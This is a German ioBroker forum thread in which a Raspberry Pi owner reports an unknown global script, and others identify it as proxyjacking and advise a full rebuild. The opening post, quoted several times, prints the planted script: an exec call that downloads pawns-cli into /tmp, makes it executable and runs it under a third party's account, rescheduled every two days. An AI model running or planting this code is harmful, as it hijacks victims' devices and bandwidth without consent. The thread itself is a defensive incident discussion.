Skip to content
  • Recent
  • Tags
  • 0 Unread 0
  • Categories
  • Unreplied
  • Popular
  • GitHub
  • Docu
  • Hilfe
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Collapse
Logo
  1. ioBroker Community Home
  2. Deutsch
  3. Skripten / Logik
  4. [gelöst]Seltsames Script unter Global

NEWS

  • Wartung am 15.11. – Forum ab 22:00 Uhr nicht erreichbar
    BluefoxB
    Bluefox
    11
    2
    200

  • UPDATE 31.10.: Amazon Alexa - ioBroker Skill läuft aus ?
    apollon77A
    apollon77
    48
    3
    7.9k

  • Monatsrückblick – September 2025
    BluefoxB
    Bluefox
    13
    1
    1.7k

[gelöst]Seltsames Script unter Global

[gelöst]Seltsames Script unter Global

Scheduled Pinned Locked Moved Skripten / Logik
27 Posts 5 Posters 2.8k Views 4 Watching
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • C Offline
    C Offline
    chemieka
    wrote on last edited by chemieka
    #3

    Das ist eine PI4. Normale Installation von IOBroker laut hier:
    https://forum.iobroker.net/topic/51869/installation-auf-raspi-einfacher-geht-s-nicht

    Das Script ist nur zu finden wenn Expert Aktiviert ist, sonst ist der Ordner Global nicht zu sehen.

    Das System ist neu aufgesetzt und dann das Backup eingespielt. Zwei Tage alt.

    Da steckt wohl das hier dahinter: https://pawns.app/
    Möchte meinen da wollte oder hat sich jemand meine PI4 leihen wollen.
    Wüsste gern ob es gelungen ist und wenn ja wie ich das runter bekomme.

    1 Reply Last reply
    0
    • C chemieka

      Hallo
      Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
      Wenn ich mir das anschauen, denke ich mir da ist was faul.
      Der Inhalt wäre folgendes:

      exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
      schedule("10 6 */2 * *", async function () {
        exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
      });
      

      Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

      Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

      crunchipC Away
      crunchipC Away
      crunchip
      Forum Testing Most Active
      wrote on last edited by
      #4

      @chemieka Geld verdienen?
      https://github.com/IPRoyal/pawns-cli/blob/main/readme.md

      umgestiegen von Proxmox auf Unraid

      C 1 Reply Last reply
      0
      • crunchipC crunchip

        @chemieka Geld verdienen?
        https://github.com/IPRoyal/pawns-cli/blob/main/readme.md

        C Offline
        C Offline
        chemieka
        wrote on last edited by chemieka
        #5

        @crunchip
        Na das hatte ich auch gefunden. Aber sicher nicht selber drauf gemacht. Das System ist ja nur zwei Tage alt. Über das Backup evtl. wieder draufgekommen?

        crunchipC 1 Reply Last reply
        0
        • C chemieka

          @crunchip
          Na das hatte ich auch gefunden. Aber sicher nicht selber drauf gemacht. Das System ist ja nur zwei Tage alt. Über das Backup evtl. wieder draufgekommen?

          crunchipC Away
          crunchipC Away
          crunchip
          Forum Testing Most Active
          wrote on last edited by crunchip
          #6

          @chemieka na entweder selbst oder du hast ganz andere Probleme, dann solltest du dein Netzwerk mal checken und wer weiß was sonst noch so sein könnte

          Portfreigabe für iobroker?

          umgestiegen von Proxmox auf Unraid

          C 1 Reply Last reply
          0
          • crunchipC crunchip

            @chemieka na entweder selbst oder du hast ganz andere Probleme, dann solltest du dein Netzwerk mal checken und wer weiß was sonst noch so sein könnte

            Portfreigabe für iobroker?

            C Offline
            C Offline
            chemieka
            wrote on last edited by chemieka
            #7

            @crunchip
            Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
            Wie könnte ich prüfen ob die Installation durchgeführt wurde?

            Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.

            crunchipC 1 Reply Last reply
            0
            • C chemieka

              Hallo
              Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
              Wenn ich mir das anschauen, denke ich mir da ist was faul.
              Der Inhalt wäre folgendes:

              exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
              schedule("10 6 */2 * *", async function () {
                exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
              });
              

              Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

              Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

              GlasfaserG Offline
              GlasfaserG Offline
              Glasfaser
              wrote on last edited by Glasfaser
              #8

              @chemieka sagte in Seltsames Script unter Global:

              device-name=xxxxxxxxxx@io

              was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX

              Hast du eine DynDNS Service

              EDIT :

              DynDNS von @chemieka unkenntlich gemacht

              Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

              GlasfaserG 1 Reply Last reply
              1
              • C chemieka

                @crunchip
                Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
                Wie könnte ich prüfen ob die Installation durchgeführt wurde?

                Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.

                crunchipC Away
                crunchipC Away
                crunchip
                Forum Testing Most Active
                wrote on last edited by
                #9

                @chemieka ich bin da kein Spezialist für
                da steht bisserl Hintergrund info
                https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/

                umgestiegen von Proxmox auf Unraid

                C 1 Reply Last reply
                0
                • crunchipC crunchip

                  @chemieka ich bin da kein Spezialist für
                  da steht bisserl Hintergrund info
                  https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/

                  C Offline
                  C Offline
                  chemieka
                  wrote on last edited by
                  #10

                  @crunchip
                  Der Hintergrund ist mir bekannt bzw. schon gelesen.
                  Könnte man irgendwie erkennen ob die Installation drauf ist? Seltsam ist auch, die Dateien im Tmp sind vom Anfang Juni. Das System aber zwei Tage alt. Hm.
                  Ich glaube ich mache nochmal eine neue Karte fertig und schau mal dann.

                  1 Reply Last reply
                  0
                  • GlasfaserG Glasfaser

                    @chemieka sagte in Seltsames Script unter Global:

                    device-name=xxxxxxxxxx@io

                    was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX

                    Hast du eine DynDNS Service

                    EDIT :

                    DynDNS von @chemieka unkenntlich gemacht

                    GlasfaserG Offline
                    GlasfaserG Offline
                    Glasfaser
                    wrote on last edited by
                    #11

                    @glasfaser sagte in Seltsames Script unter Global:

                    @chemieka sagte in Seltsames Script unter Global:

                    device-name=chemieka.ddnss.de@io

                    was auch komisch ist ...das ich auch dein Username ...

                    Hast du eine DynDNS Service

                    Was ist hiermit !?

                    Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?

                    Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                    C 1 Reply Last reply
                    0
                    • GlasfaserG Glasfaser

                      @glasfaser sagte in Seltsames Script unter Global:

                      @chemieka sagte in Seltsames Script unter Global:

                      device-name=chemieka.ddnss.de@io

                      was auch komisch ist ...das ich auch dein Username ...

                      Hast du eine DynDNS Service

                      Was ist hiermit !?

                      Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?

                      C Offline
                      C Offline
                      chemieka
                      wrote on last edited by
                      #12

                      @glasfaser
                      Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen.

                      GlasfaserG 1 Reply Last reply
                      0
                      • C chemieka

                        @glasfaser
                        Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen.

                        GlasfaserG Offline
                        GlasfaserG Offline
                        Glasfaser
                        wrote on last edited by
                        #13

                        @chemieka sagte in Seltsames Script unter Global:

                        Ja das stimmt schon,

                        Die DynDNS ist von dir selber oder die IP mit der 06 !?

                        Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                        C 1 Reply Last reply
                        0
                        • GlasfaserG Glasfaser

                          @chemieka sagte in Seltsames Script unter Global:

                          Ja das stimmt schon,

                          Die DynDNS ist von dir selber oder die IP mit der 06 !?

                          C Offline
                          C Offline
                          chemieka
                          wrote on last edited by
                          #14

                          @glasfaser
                          beides.

                          GlasfaserG 2 Replies Last reply
                          0
                          • C chemieka

                            @glasfaser
                            beides.

                            GlasfaserG Offline
                            GlasfaserG Offline
                            Glasfaser
                            wrote on last edited by
                            #15

                            @chemieka

                            Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx

                            denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
                            Werde Ihn dazu editieren !!

                            Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                            C 1 Reply Last reply
                            0
                            • GlasfaserG Glasfaser

                              @chemieka

                              Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx

                              denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
                              Werde Ihn dazu editieren !!

                              C Offline
                              C Offline
                              chemieka
                              wrote on last edited by
                              #16

                              @glasfaser
                              Ja bitte. System mal neu Aufsetzen.

                              1 Reply Last reply
                              0
                              • C chemieka

                                Hallo
                                Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
                                Wenn ich mir das anschauen, denke ich mir da ist was faul.
                                Der Inhalt wäre folgendes:

                                exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
                                schedule("10 6 */2 * *", async function () {
                                  exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
                                });
                                

                                Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

                                Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

                                OliverIOO Offline
                                OliverIOO Offline
                                OliverIO
                                wrote on last edited by
                                #17

                                @chemieka
                                so ein system ist nicht mehr vertrauenswürdig.
                                wer weiß was da noch so auf dem system drauf ist oder sich
                                über so eine anwendung mit drauf gepfriemelt hat.

                                eigentlich bleibt nur noch eins,
                                alles platt machen
                                neu aufbauen
                                ob du dem backup noch vertraust musst du selber überlegen
                                ich würde es nicht.

                                Meine Adapter und Widgets
                                TVProgram, SqueezeboxRPC, OpenLiga, RSSFeed, MyTime,, pi-hole2, vis-json-template, skiinfo, vis-mapwidgets, vis-2-widgets-rssfeed
                                Links im Profil

                                C 1 Reply Last reply
                                1
                                • C chemieka

                                  @glasfaser
                                  beides.

                                  GlasfaserG Offline
                                  GlasfaserG Offline
                                  Glasfaser
                                  wrote on last edited by
                                  #18

                                  @chemieka sagte in Seltsames Script unter Global:

                                  @glasfaser
                                  beides.

                                  Große Frage ... wie kommt Mister X an deine DynDNS ,
                                  hast du Sie in ioBroker oder wo anderes auch hinterlegt !?

                                  Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                                  OliverIOO 1 Reply Last reply
                                  0
                                  • OliverIOO OliverIO

                                    @chemieka
                                    so ein system ist nicht mehr vertrauenswürdig.
                                    wer weiß was da noch so auf dem system drauf ist oder sich
                                    über so eine anwendung mit drauf gepfriemelt hat.

                                    eigentlich bleibt nur noch eins,
                                    alles platt machen
                                    neu aufbauen
                                    ob du dem backup noch vertraust musst du selber überlegen
                                    ich würde es nicht.

                                    C Offline
                                    C Offline
                                    chemieka
                                    wrote on last edited by
                                    #19

                                    @oliverio
                                    So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                                    OliverIOO 1 Reply Last reply
                                    0
                                    • GlasfaserG Glasfaser

                                      @chemieka sagte in Seltsames Script unter Global:

                                      @glasfaser
                                      beides.

                                      Große Frage ... wie kommt Mister X an deine DynDNS ,
                                      hast du Sie in ioBroker oder wo anderes auch hinterlegt !?

                                      OliverIOO Offline
                                      OliverIOO Offline
                                      OliverIO
                                      wrote on last edited by
                                      #20

                                      @glasfaser

                                      wer einmal im netz ist, kann ja theoretisch alle rechner erreichen.
                                      wenn auf diesen dann auch eine laxe security existiert, dann ist nix sicher.
                                      nas/samba-freigabe ohne passwort?
                                      windows ohne passwort?
                                      raspberries mit standard login?
                                      nas mit standard login?
                                      etc.

                                      als Ergänzung zu meinem obigen post. theoretisch ist das ganze netz verunreinigt.

                                      Meine Adapter und Widgets
                                      TVProgram, SqueezeboxRPC, OpenLiga, RSSFeed, MyTime,, pi-hole2, vis-json-template, skiinfo, vis-mapwidgets, vis-2-widgets-rssfeed
                                      Links im Profil

                                      1 Reply Last reply
                                      1
                                      • C chemieka

                                        @oliverio
                                        So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                                        OliverIOO Offline
                                        OliverIOO Offline
                                        OliverIO
                                        wrote on last edited by OliverIO
                                        #21

                                        @chemieka sagte in Seltsames Script unter Global:

                                        @oliverio
                                        So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                                        und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
                                        oder in einem der npm module nix eingebaut wurde?
                                        dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
                                        derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
                                        das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt.

                                        Meine Adapter und Widgets
                                        TVProgram, SqueezeboxRPC, OpenLiga, RSSFeed, MyTime,, pi-hole2, vis-json-template, skiinfo, vis-mapwidgets, vis-2-widgets-rssfeed
                                        Links im Profil

                                        C 1 Reply Last reply
                                        2
                                        • OliverIOO OliverIO

                                          @chemieka sagte in Seltsames Script unter Global:

                                          @oliverio
                                          So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                                          und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
                                          oder in einem der npm module nix eingebaut wurde?
                                          dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
                                          derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
                                          das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt.

                                          C Offline
                                          C Offline
                                          chemieka
                                          wrote on last edited by
                                          #22

                                          @oliverio
                                          Ich schaue so genau wie möglich hin. Danke bis hierhin. Gibts ja nicht was alles so möglich ist.

                                          GlasfaserG 1 Reply Last reply
                                          0
                                          Reply
                                          • Reply as topic
                                          Log in to reply
                                          • Oldest to Newest
                                          • Newest to Oldest
                                          • Most Votes


                                          Support us

                                          ioBroker
                                          Community Adapters
                                          Donate

                                          150

                                          Online

                                          32.4k

                                          Users

                                          81.3k

                                          Topics

                                          1.3m

                                          Posts
                                          Community
                                          Impressum | Datenschutz-Bestimmungen | Nutzungsbedingungen
                                          ioBroker Community 2014-2025
                                          logo
                                          • Login

                                          • Don't have an account? Register

                                          • Login or register to search.
                                          • First post
                                            Last post
                                          0
                                          • Recent
                                          • Tags
                                          • Unread 0
                                          • Categories
                                          • Unreplied
                                          • Popular
                                          • GitHub
                                          • Docu
                                          • Hilfe